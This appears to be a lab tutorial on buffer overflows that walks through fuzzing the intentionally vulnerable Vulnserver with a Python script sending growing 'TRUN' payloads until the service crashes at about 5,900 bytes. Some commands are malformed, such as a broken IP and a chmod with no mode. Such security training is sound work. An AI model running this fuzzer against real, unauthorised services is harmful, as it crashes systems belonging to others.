Introduction to Buffer Overflows

Anatomy of Memory

Anatomy of the Stack

Fuzzing

Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver

Immunity Debuger - https://www.immunityinc.com/products/debugger/

Vulnserver Test

1. Open the vulnserver program on windows os.

2. Connect to the vulnserver from Kali Linux.

nc -nv 10.0..XX 

3.Write the Python fuzzer test script on Kali Linux

 #!/usr/bin/python

 import socket

 import sys

 buffer=["A"]

 counter=100

 while len(buffer) <= 30:

     buffer.append("A"*counter)

     counter=counter+200

 for string in buffer:

     print "Fuzzing vulnserver with %s bytes" % len(string)

     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     connect=s.connect(('10.0.0.XX',9999))

     s.send('TRUN /.:/' + string)

     s.close()

Grant the rights to the script file and execute the fuzzer.py.

chmod  fuzzer.py
./fuzzer.py

The vulnserver crashed with 5900 bytes.

Immunity Debuger

GUI Screenshoot

Open or attach the vulnserver program.

Perform the fuzzer.py on Kali Linux.

./fuzzer.py

The vulnserver crashed finally.

最新文章

1. C#实现在图片上斜着写字
2. Linux CentOS下如何确认MySQL服务已经启动
3. Swift中的Masonry第三方库——SnapKit
4. 二十四种设计模式：装饰模式(Decorator Pattern)
5. [Flex] PopUpButton系列 —— 设置弹出菜单与主按钮之间的间隔
6. 让网站变灰的CSS代码（支持IE、FIREFOX和CHROME）
7. SQL Server查询优化方法(查询速度慢的原因很多，常见如下几种) .
8. spring mvc 使用及json 日期转换解决方案
9. 源码来袭！！！基于jquery的ajax分页插件（demo+源码）
10. eNSP自学入门（基础）
11. shell变量$(CURDIR),$0,$1,$2,$#含义解释
12. 【scikit-learn 0.19 中文文档 】安装 scikit-learn | ApacheCN
13. 文件末尾判断feof
14. Xilinx Vivado的使用详细介绍（4）：Zedboard+vivado之流水灯（加SDK）
15. 用递归方法计算斐波那契数列（Recursion Fibonacci Sequence Python)
16. 《Inside C#》笔记(二) 初识C#
17. iOS 判断App启动方式
18. django中表单处理
19. Python 连接 redis 模块
20. 关于div

热门文章

1. 大众点评cat实时监控简介及部署
2. Java中设置多个Access-Control-Allow-Origin跨域访问
3. Spring事务深入剖析--spring事务失效的原因
4. 2、struct2的工作流程
5. Django REST Framework(一) Serializer和ModelSerializer
6. 这一次搞懂SpringBoot核心原理（自动配置、事件驱动、Condition）
7. Nginx深入学习（一篇搞定）
8. SpringBoot--使用redis实现分布式限流
9. 3分钟理解NMS非极大值抑制
10. js事件入门（5）